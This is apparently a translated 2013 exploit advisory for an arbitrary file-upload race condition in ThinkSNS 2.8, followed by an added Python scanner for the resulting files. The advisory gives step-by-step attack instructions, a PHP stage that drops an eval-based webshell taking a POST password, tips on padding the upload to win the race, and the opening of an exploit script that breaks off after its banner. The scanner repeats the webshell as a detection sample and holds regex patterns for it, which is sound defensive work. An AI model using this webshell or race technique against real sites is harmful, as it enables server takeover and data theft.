ThinkSNS 2.8 file upload exploit (exp) - vulnerability warning - the black bar safety net

ID MYHACK58:62201337102
Type myhack58
Reporter Anonymous
Modified 2013-02-01T00:00:00


Vulnerable version: the latest 2.8 stable release. Other versions were not tested.
Vulnerable file: thumb.php
Author: Wei kunpeng

1. Prepare the following PHP file and upload it to the server yourself. The file content is as follows:

<?php echo "<?php fwrite(fopen('img.php','w'), '<?php @eval(\$_POST[\"xpass\"]);?>'); ?>" ?>

2. Calculate the temporary filename; see line 99 of the file.

3. Upload the temporary file.

4. Access the temporary file.

There is a problem here, however: the PHP script executes very quickly, so performing steps 3 and 4 by hand would require very fast reactions. A tool is therefore needed to submit the data in place of a person. In addition, to lengthen the execution time of step 3 and so gain time for step 4, the PHP file prepared in step 1 needs to be padded with filler content. In testing, the success rate was highest when the file size was 300KB: too small and the time window is too short, too large and the upload may not go through.

The contents of the exploit file are as follows; I will not explain them in detail.

<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// Open a TCP connection to the host and send the raw request.
function http_send($host, $port, $headers)
{
    $fp = fsockopen($host, $port);
    if (!$fp) die('Connection -> fail');
    fputs($fp, $headers);
    return $fp;
}

// Read the whole response from the socket, then close it.
function http_recv($fp)
{
    $ret = "";
    while (!feof($fp)) $ret .= fgets($fp, 1024);
    fclose($fp);
    return $ret;
}

print "\n# ThinkSns Arbitrary File Upload #\n";
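A defender-side check for the two files described in steps 1 to 4, as an added example that is not part of the original post: it walks a web root and flags both the uploaded stage that writes PHP to disk and the dropped img.php that evaluates request input. The regexes, indicator names and the sample path upload_tmp/constructed.php are assumptions constructed for illustration, not ThinkSNS paths.

```python
import os
import re
import tempfile

INDICATORS = [
    # Stage 2 (the dropped img.php): request input passed straight to eval/assert.
    ("eval-of-request-input", re.compile(
        rb"(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)),
    # Stage 1 (the uploaded file): fwrite(fopen(..., 'w'), ...) whose data is PHP.
    ("php-writes-php", re.compile(
        rb"fwrite\s*\(\s*fopen\s*\([^)]*['\"]w['\"]\s*\)\s*,[^;]*<\?php", re.I)),
]

def scan_file(path, max_bytes=2 * 1024 * 1024):
    """Return indicator names found in one file. The read limit sits well above
    the 300KB padded size in the write-up, so code after the filler is still read."""
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)
    return [name for name, rx in INDICATORS if rx.search(data)]

def scan_tree(root):
    """Walk a web root and map relative path -> indicators for every hit."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                found = scan_file(path)
            except OSError:
                continue  # unreadable, or a temp file deleted mid-scan
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits

def demo():
    # Constructed web root: both stages from the write-up plus one clean file.
    shell = b"<?php @eval($_POST[\"xpass\"]);?>"
    samples = {
        "upload_tmp/constructed.php":
            b"<?php fwrite(fopen('img.php','w'), '" + shell + b"'); ?>",
        "img.php": shell,
        "index.php": b"<?php echo 'hello'; ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(body)
        return scan_tree(root)
```

Because the uploaded stage exists only briefly, a periodic scan is most likely to catch the persistent img.php; the stage-1 indicator is more useful on files captured by upload logging or a file-integrity monitor.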
